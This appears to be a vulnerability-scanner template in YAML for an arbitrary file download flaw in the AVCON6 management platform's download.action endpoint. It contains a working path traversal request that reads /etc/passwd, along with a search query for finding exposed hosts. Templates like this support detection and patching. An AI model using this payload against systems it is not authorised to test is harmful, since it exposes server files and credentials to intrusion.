Description
File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
id: avcon6-lfi
info:
name: AVCON6 - Arbitrary File Download
author: DhiyaneshDk
severity: high
description: |
File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
classification:
cwe-id: CWE-23,CWE-73
metadata:
verified: true
max-request: 1
fofa-query: app="AVCON-6"
tags: avcon6,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/download.action?filename=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- "filename="
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204ca2d8f896fad6cd4682cf7fe47ea8324f53bb30ed4851b890de5ab65c62bd2e022061c220b4361462349e665ace3786d79dc160cda538f6c6fbfdb2b1eb1919b31a:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.